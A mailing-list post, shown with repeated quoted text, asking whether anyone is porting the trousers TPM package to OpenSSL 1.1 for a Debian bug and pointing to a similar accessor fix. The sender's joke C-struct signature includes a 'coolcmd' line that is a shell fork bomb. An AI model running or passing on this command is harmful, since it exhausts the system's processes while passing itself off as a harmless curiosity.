Thomas Habets
2016-10-27 09:53:45 UTC
Because it doesn't support openssl 1.1.
http://bugs.debian.org/828579
Is anyone working on this?
I made similar fixes for my tool here:
https://github.com/ThomasHabets/simple-tpm-pk11/commit/354f0cf3a193dbe8b1151059a08b0598531b645c
The changes in trousers seem to be of the same type: Direct access to
struct members should be replaced with method accessors.
http://bugs.debian.org/828579
Is anyone working on this?
I made similar fixes for my tool here:
https://github.com/ThomasHabets/simple-tpm-pk11/commit/354f0cf3a193dbe8b1151059a08b0598531b645c
The changes in trousers seem to be of the same type: Direct access to
struct members should be replaced with method accessors.
--
typedef struct me_s {
char name[] = { "Thomas Habets" };
char email[] = { "***@habets.se" };
char kernel[] = { "Linux" };
char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt" };
char pgp[] = { "9907 8698 8A24 F52F 1C2E 87F6 39A4 9EEA 460A 0169" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
typedef struct me_s {
char name[] = { "Thomas Habets" };
char email[] = { "***@habets.se" };
char kernel[] = { "Linux" };
char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt" };
char pgp[] = { "9907 8698 8A24 F52F 1C2E 87F6 39A4 9EEA 460A 0169" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;